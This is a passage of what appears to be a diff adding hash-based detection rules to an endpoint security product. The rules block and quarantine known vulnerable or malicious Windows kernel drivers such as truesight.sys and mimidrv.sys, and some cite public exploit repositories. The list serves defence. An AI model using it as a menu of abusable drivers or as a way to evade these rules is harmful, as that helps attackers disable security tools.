Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c8cb881-f36d-57f8-bb4e-e8a471aaeb89", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498119Z", + "creation_date": "2026-03-23T11:45:31.498123Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498130Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34c7a941c54c83fd0a9656918315d4544ecfba933e18d30d1aeef8ae634ec8e4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c8dba25-79ab-5b2b-8c9d-7c5a80e20caa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477931Z", + "creation_date": "2026-03-23T11:45:31.477935Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477945Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2dee1a21f277a107ad0f8e76e42cbd255e529f87bb1b16d64bd79771a7270ed4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c915589-86f6-50a7-a39f-f3cae1dc435e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823608Z", + "creation_date": "2026-03-23T11:45:30.823610Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823616Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3552940a50d22dd481c5b5cc5f76b98cf57bae05741a813647f88d84a9a48b5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c934d41-eb80-5e55-bbaf-5d6546a15fc8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463042Z", + "creation_date": "2026-03-23T11:45:30.463045Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463054Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2da2b883e48e929f5365480d487590957d9e6582cc6da2c0b42699ba85e54fe2", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7c939e3f-0d92-5a3d-b40d-d1d29d972fd7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979995Z", + "creation_date": "2026-03-23T11:45:29.979997Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980002Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4a7da2cf59a4a21fc42b611df1d59cae75051925a7ddf42bf216cc1a026eadb", + "comment": 
"Vulnerable Kernel Driver (aka Monitor_win10_x64.sys) [https://www.loldrivers.io/drivers/ca415ed5-b611-4840-bfb2-6e1eacac33d1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c9aa0e8-808f-5103-b7f5-f0774686e9e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973827Z",
+ "creation_date": "2026-03-23T11:45:29.973829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89108a15f009b285db4ef94250b889d5b11b96b4aa7b190784a6d1396e893e10",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7c9b1b13-14f1-5199-b92b-db5d1d503e11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463526Z",
+ "creation_date": "2026-03-23T11:45:30.463531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463540Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a78c9871da09fab21aec9b88a4e880f81ecb1ed0fa941f31cc2f041067e8e972",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ca3fb71-5f7f-5b73-bf66-91372bf455ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142593Z",
+ "creation_date": "2026-03-23T11:45:31.142595Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142601Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac916d75cd309ea2f40e7a75c645a52e5f1fc39827605b05f4968dcd2b059ab3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cab0cb2-a8d0-552a-9d2b-1e76d389454b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148916Z",
+ "creation_date": "2026-03-23T11:45:31.148919Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148924Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39b976b15968a825cb241307a47dfd03cd263c2d6dc583741c8937264b0dfa1f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cb2016b-cba2-5145-944f-c88293c178c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481623Z",
+ "creation_date": "2026-03-23T11:45:30.481624Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481630Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2dee316cd07963c2eb7ebb1b4189eca78786c835aaafeb6467b37c1353d821a",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cb5907d-8057-51af-8865-016f2192220d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825277Z",
+ "creation_date": "2026-03-23T11:45:31.825281Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825291Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b3c82a363f5f4cd33100619977fa030b40aecf139145534649fb9855a94d06c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cb77c52-f623-57cc-9479-8dd7acf979d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481731Z",
+ "creation_date": "2026-03-23T11:45:30.481733Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481738Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19595c3de596f8b705eef1b135768d3051305698ceed083401f8acfba4bd5393",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cb948a1-79ee-56b4-b7e7-e09f8e14b1e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975060Z",
+ "creation_date": "2026-03-23T11:45:29.975062Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c5251d84f6dab1327b2f1ea0c5ccbe4b2790ae6eda0e20aa9d9acfc01e427fd9",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cbdb0de-3ff9-56a5-85ca-6f599768f2c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481586Z",
+ "creation_date": "2026-03-23T11:45:30.481588Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eae5c993b250dcc5fee01deeb30045b0e5ee7cf9306ef6edd8c58e4dc743a8ed",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ccc0042-e2fc-5016-8335-37ae8532ebdc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468047Z",
+ "creation_date": "2026-03-23T11:45:30.468050Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468060Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae55720475ab1c67e39720954111b90e96a5ebf5d3b91277f4c225a228d8739a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7cfe9c60-6ac5-5f72-b2cc-9ac94046baa2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829827Z",
+ "creation_date": "2026-03-23T11:45:30.829829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829835Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "75e07a123051d99caaf198834ee18164a005ff750eca127839d281f7bc5c1d30",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d070e9d-39e2-5be5-9473-114a40c06509",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160970Z",
+ "creation_date": "2026-03-23T11:45:31.160972Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160978Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bfb8abda2a0a39017307430131556ef48bf1183347aa91706a3e70f32c1531a3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d0a2afd-8630-5d39-8f6f-21e6146c092c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826788Z",
+ "creation_date": "2026-03-23T11:45:31.826792Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826800Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c85a3607f666212d7f6e5891d9c4b4f69d4c2b82dcfa1c3152922e3d2cf3fe5c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d13ba3c-6bd0-5b71-9760-0ca574aef54e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822501Z",
+ "creation_date": "2026-03-23T11:45:30.822505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822513Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72805e13777a39b440ef381720c0491e6091f9cb6c7b387be33ca5491fcfbfbd",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d16a9ea-b998-5a4e-83bc-a7acc28f9eec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972825Z",
+ "creation_date": "2026-03-23T11:45:29.972827Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972832Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b59ad4a1f71f8379c89fc3bc1d2827b0785bbb0192b43549034f24a133eea3a5",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d325d2e-c61f-5a22-9016-f0e27001bd37",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824295Z",
+ "creation_date": "2026-03-23T11:45:31.824298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824306Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0172627836f81e21554aa9c917dd609475a636e6a3a7365a327c394d4c682f92",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d3392fd-c8ff-5126-8192-78ae2d05bac8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817022Z",
+ "creation_date": "2026-03-23T11:45:31.817024Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817030Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82ba478ac307f29eebe91ad48c821b1a81ddfd87ec76eb3fe551fa489835f8f4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d3a708a-ea4b-5ef2-bf2d-6e25f3c59a74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609754Z",
+ "creation_date": "2026-03-23T11:45:29.609755Z",
